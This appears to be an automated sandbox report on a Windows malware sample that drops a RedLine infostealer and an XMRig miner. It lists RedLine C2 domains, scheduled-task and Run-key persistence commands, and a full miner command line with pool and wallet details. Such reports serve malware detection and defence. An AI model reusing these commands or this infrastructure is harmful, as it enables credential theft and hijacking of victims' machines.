Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
21-08-2021 14:34
Static task
static1
Behavioral task
behavioral1
Sample
a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe
Resource
win10v20210408
General
-
Target
a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe
-
Size
234KB
-
MD5
c32710820e0c9fccc1234fe6e7d7f1fb
-
SHA1
80c54657f5571f2e8f20792c45d7848e1f1e4f78
-
SHA256
a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351
-
SHA512
3023dd2082a369edcc0cee0065f38b639de13351dfb6a32e497f52e99d7b22ce18e067076dc5bb996617f21c178579b5b15c157ad1572bd5c6d42fecf7809222
Malware Config
Extracted
redline
3
deyrolorme.xyz:80
xariebelal.xyz:80
anihelardd.xyz:80
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/728-148-0x0000000005610000-0x0000000005642000-memory.dmp family_redline -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/656-195-0x0000000140000000-0x0000000140763000-memory.dmp xmrig behavioral1/memory/656-196-0x00000001402F327C-mapping.dmp xmrig behavioral1/memory/656-198-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
Executes dropped EXE 8 IoCs
Processes:
Chrome3.exeJoBrowserSet.exe4260884.exe4679595.exe2839185.exeWinHoster.exeservices64.exesihost64.exepid process 3132 Chrome3.exe 3628 JoBrowserSet.exe 1264 4260884.exe 2224 4679595.exe 728 2839185.exe 3980 WinHoster.exe 3744 services64.exe 2204 sihost64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
4679595.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4679595.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 3744 set thread context of 656 3744 services64.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1468 1264 WerFault.exe 4260884.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3252 schtasks.exe 3184 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
4260884.exeWerFault.exe2839185.exeChrome3.exeservices64.exeexplorer.exepid process 1264 4260884.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 1468 WerFault.exe 728 2839185.exe 3132 Chrome3.exe 3744 services64.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe 656 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
JoBrowserSet.exe4260884.exe2839185.exeWerFault.exeChrome3.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 3628 JoBrowserSet.exe Token: SeDebugPrivilege 1264 4260884.exe Token: SeDebugPrivilege 728 2839185.exe Token: SeDebugPrivilege 1468 WerFault.exe Token: SeDebugPrivilege 3132 Chrome3.exe Token: SeDebugPrivilege 3744 services64.exe Token: SeLockMemoryPrivilege 656 explorer.exe Token: SeLockMemoryPrivilege 656 explorer.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exeJoBrowserSet.exe4679595.exeChrome3.execmd.exeservices64.execmd.exedescription pid process target process PID 644 wrote to memory of 3132 644 a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe Chrome3.exe PID 644 wrote to memory of 3132 644 a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe Chrome3.exe PID 644 wrote to memory of 3628 644 a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe JoBrowserSet.exe PID 644 wrote to memory of 3628 644 a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe JoBrowserSet.exe PID 3628 wrote to memory of 1264 3628 JoBrowserSet.exe 4260884.exe PID 3628 wrote to memory of 1264 3628 JoBrowserSet.exe 4260884.exe PID 3628 wrote to memory of 2224 3628 JoBrowserSet.exe 4679595.exe PID 3628 wrote to memory of 2224 3628 JoBrowserSet.exe 4679595.exe PID 3628 wrote to memory of 2224 3628 JoBrowserSet.exe 4679595.exe PID 3628 wrote to memory of 728 3628 JoBrowserSet.exe 2839185.exe PID 3628 wrote to memory of 728 3628 JoBrowserSet.exe 2839185.exe PID 3628 wrote to memory of 728 3628 JoBrowserSet.exe 2839185.exe PID 2224 wrote to memory of 3980 2224 4679595.exe WinHoster.exe PID 2224 wrote to memory of 3980 2224 4679595.exe WinHoster.exe PID 2224 wrote to memory of 3980 2224 4679595.exe WinHoster.exe PID 3132 wrote to memory of 1112 3132 Chrome3.exe cmd.exe PID 3132 wrote to memory of 1112 3132 Chrome3.exe cmd.exe PID 1112 wrote to memory of 3252 1112 cmd.exe schtasks.exe PID 1112 wrote to memory of 3252 1112 cmd.exe schtasks.exe PID 3132 wrote to memory of 3744 3132 Chrome3.exe services64.exe PID 3132 wrote to memory of 3744 3132 Chrome3.exe services64.exe PID 3744 wrote to memory of 2056 3744 services64.exe cmd.exe PID 3744 wrote to memory of 2056 3744 services64.exe cmd.exe PID 3744 wrote to memory of 2204 3744 services64.exe sihost64.exe PID 3744 wrote to memory of 2204 3744 services64.exe sihost64.exe PID 2056 wrote to memory of 3184 2056 cmd.exe schtasks.exe PID 2056 wrote to memory of 3184 2056 cmd.exe schtasks.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe PID 3744 wrote to memory of 656 3744 services64.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe"C:\Users\Admin\AppData\Local\Temp\a9a907994d59fc53b990a0b933417d3601aa2a92da077177e09e0adc3b919351.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
PID:3252
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:3184
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
PID:2204
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.living/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6L1cbBoqfaC06bAmgY02TjBZdfqiCoHvjS6kga2LQa1B" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe"C:\Users\Admin\AppData\Local\Temp\JoBrowserSet.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\AppData\Roaming\4260884.exe"C:\Users\Admin\AppData\Roaming\4260884.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1264 -s 19204⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
-
C:\Users\Admin\AppData\Roaming\4679595.exe"C:\Users\Admin\AppData\Roaming\4679595.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:3980
-
-
-
C:\Users\Admin\AppData\Roaming\2839185.exe"C:\Users\Admin\AppData\Roaming\2839185.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
70a7e04ae690a340005093741773d4c0
SHA1feee658250fc2310d7f57d3924c77f5fb3e5f0b5
SHA256720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c
SHA51226ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a
-
MD5
70a7e04ae690a340005093741773d4c0
SHA1feee658250fc2310d7f57d3924c77f5fb3e5f0b5
SHA256720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c
SHA51226ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a
-
MD5
f500da99a480c93ffa943aa0df68385f
SHA1ae1d68cda3396d12d9dda1060710e2d3e461f5a1
SHA2563b1df5ffc18d2d046acb1d2a691b1b9f6a9bf31d5b0f26fc796f37dd6f786771
SHA51276cf46b94cfc1e5c6a66b8622911df4f0ec06aea32a5f5c98a8f8df49b0af6c4c8a4570d156cb6c707c23ad61746de5a35c96c78f4cf9dc4ce6caaaf0e218f3c
-
MD5
f500da99a480c93ffa943aa0df68385f
SHA1ae1d68cda3396d12d9dda1060710e2d3e461f5a1
SHA2563b1df5ffc18d2d046acb1d2a691b1b9f6a9bf31d5b0f26fc796f37dd6f786771
SHA51276cf46b94cfc1e5c6a66b8622911df4f0ec06aea32a5f5c98a8f8df49b0af6c4c8a4570d156cb6c707c23ad61746de5a35c96c78f4cf9dc4ce6caaaf0e218f3c
-
MD5
09d62b28d2630f7bc25a50d695707790
SHA1e10c849c0d2b1cbaedb87b232660952809d85431
SHA256acde34968315b6e34c222006ce337b853aa36f54b802cf210c5181d6eea474c9
SHA51252a7c687681edf3265f57d61b4cec9427ab45f1cf1e970026efba2b86fbb842611b05b08163054dfe9d625ba14b85518bed9226602bece4b18bef39a925bed5a
-
MD5
09d62b28d2630f7bc25a50d695707790
SHA1e10c849c0d2b1cbaedb87b232660952809d85431
SHA256acde34968315b6e34c222006ce337b853aa36f54b802cf210c5181d6eea474c9
SHA51252a7c687681edf3265f57d61b4cec9427ab45f1cf1e970026efba2b86fbb842611b05b08163054dfe9d625ba14b85518bed9226602bece4b18bef39a925bed5a
-
MD5
5292ec8e878617edfbf1700b1da8883c
SHA13877ef66899f568abc499914feb47ee36bb722f6
SHA2560930d8576aea1ddb7f337ea24e5ad5a2a8734d46d96d6616e079103d6eca2e43
SHA5124e9c564730fed94dbae1e0fd0afc2744dd3b860266e6457ed9d488d7ad3eefb522676c4333d84400032cbeaf7449d9e3e6fd03534f50c604ae69ff7c19eca17b
-
MD5
5292ec8e878617edfbf1700b1da8883c
SHA13877ef66899f568abc499914feb47ee36bb722f6
SHA2560930d8576aea1ddb7f337ea24e5ad5a2a8734d46d96d6616e079103d6eca2e43
SHA5124e9c564730fed94dbae1e0fd0afc2744dd3b860266e6457ed9d488d7ad3eefb522676c4333d84400032cbeaf7449d9e3e6fd03534f50c604ae69ff7c19eca17b
-
MD5
3598180fddc06dbd304b76627143b01d
SHA11d39b0dd8425359ed94e606cb04f9c5e49ed1899
SHA25644a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda
SHA5128f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d
-
MD5
3598180fddc06dbd304b76627143b01d
SHA11d39b0dd8425359ed94e606cb04f9c5e49ed1899
SHA25644a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda
SHA5128f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d
-
MD5
72cb849651c3d7cd22a2a29c30696c14
SHA1372c795de4f318e819e35393581e045956eac59e
SHA256658f47980ed8a26199fd49fe8dc850c9a326fcc4975478266a123e0cc5878b52
SHA512df6a3147e72c67c62aaf0047c1a66e1c33a5e1b09c0190555624b54f2edccd19a6f573ceba0e283e89491e5aa30d596d2e1861962a4af086c93bf5cf3b1d3502
-
MD5
72cb849651c3d7cd22a2a29c30696c14
SHA1372c795de4f318e819e35393581e045956eac59e
SHA256658f47980ed8a26199fd49fe8dc850c9a326fcc4975478266a123e0cc5878b52
SHA512df6a3147e72c67c62aaf0047c1a66e1c33a5e1b09c0190555624b54f2edccd19a6f573ceba0e283e89491e5aa30d596d2e1861962a4af086c93bf5cf3b1d3502
-
MD5
3598180fddc06dbd304b76627143b01d
SHA11d39b0dd8425359ed94e606cb04f9c5e49ed1899
SHA25644a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda
SHA5128f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d
-
MD5
3598180fddc06dbd304b76627143b01d
SHA11d39b0dd8425359ed94e606cb04f9c5e49ed1899
SHA25644a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda
SHA5128f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d
-
MD5
70a7e04ae690a340005093741773d4c0
SHA1feee658250fc2310d7f57d3924c77f5fb3e5f0b5
SHA256720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c
SHA51226ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a
-
MD5
70a7e04ae690a340005093741773d4c0
SHA1feee658250fc2310d7f57d3924c77f5fb3e5f0b5
SHA256720ff3adcf57946eaec54eb3e8fe9fc4a70e309ec530b4b732656361ac843a2c
SHA51226ae461663258055230202183f30c0e31b0645feadf1c4d7ccd682bb4bb5d826e5de89f0794866e6e9c7365d64ad10665db45a39763117b3e80f8fd93e6d849a